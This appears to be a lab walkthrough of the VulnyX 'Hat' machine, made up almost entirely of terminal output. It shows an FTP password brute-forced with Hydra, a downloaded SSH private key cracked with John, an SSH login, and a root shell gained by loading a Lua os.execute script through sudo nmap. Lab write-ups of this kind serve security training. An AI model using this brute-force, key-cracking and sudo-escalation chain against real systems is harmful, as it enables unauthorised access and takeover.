靶场练习-vulnyx：Hat

┌──(root㉿kali)-[~]

└─# hydra -l admin_ftp -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.171:65535 -I -t 64

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 09:31:08

[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task

[DATA] attacking ftp://192.168.1.171:65535/

[65535][ftp] host: 192.168.1.171   login: admin_ftp   password: cowboy

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 09:32:08

┌──(root㉿kali)-[~]

└─# ftp 192.168.1.171 -p 65535

Connected to 192.168.1.171.

220 pyftpdlib 1.5.4 ready.

Name (192.168.1.171:root): admin_ftp

331 Username ok, send password.

Password: 

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls -al

229 Entering extended passive mode (|||39311|).

125 Data connection already open. Transfer starting.

drwxrwxrwx   2 cromiphi cromiphi     4096 Sep 28  2021 share

226 Transfer complete.

ftp> cd share

250 "/share" is the current directory.

ftp> ls -al

229 Entering extended passive mode (|||35733|).

125 Data connection already open. Transfer starting.

-rwxrwxrwx   1 cromiphi cromiphi     1751 Sep 28  2021 id_rsa

-rwxrwxrwx   1 cromiphi cromiphi      108 Sep 28  2021 note

226 Transfer complete.

ftp> get id_rsa

local: id_rsa remote: id_rsa

229 Entering extended passive mode (|||54749|).

125 Data connection already open. Transfer starting.

100% |**********************************************************|  1751        1.34 MiB/s    00:00 ETA

226 Transfer complete.

1751 bytes received in 00:00 (927.81 KiB/s)

ftp> get note

local: note remote: note

229 Entering extended passive mode (|||33729|).

125 Data connection already open. Transfer starting.

100% |**********************************************************|   108       10.21 KiB/s    00:00 ETA

226 Transfer complete.

108 bytes received in 00:00 (9.06 KiB/s)

┌──(root㉿kali)-[~]

└─# ssh2john id_rsa > id_rsa.hash                          

┌──(root㉿kali)-[~]

└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8

Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes

Cost 2 (iteration count) is 2 for all loaded hashes

Will run 4 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

ilovemyself      (id_rsa)     

1g 0:00:00:00 DONE (2024-06-01 09:38) 100.0g/s 160000p/s 160000c/s 160000C/s joyce..dragon1

Use the "--show" option to display all of the cracked passwords reliably

Session completed. 

┌──(root㉿kali)-[~]

└─# ssh -6 -i id_rsa cromiphi@fe80::20c:29ff:feeb:aa7f%eth0     

Enter passphrase for key 'id_rsa': 

Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

cromiphi@hat:~$ id

uid=1000(cromiphi) gid=1000(cromiphi) grupos=1000(cromiphi)

cromiphi@hat:~$ TF=$(mktemp)

cromiphi@hat:~$ echo 'os.execute("/bin/sh")' > $TF

cromiphi@hat:~$ sudo nmap --script=$TF

Starting Nmap 7.70 ( https://nmap.org ) at 2024-06-01 23:40 CEST

NSE: Warning: Loading '/tmp/tmp.K4zF4OqmnC' -- the recommended file extension is '.nse'.

# 8b4acc39c4d068623a16a89ebecd5048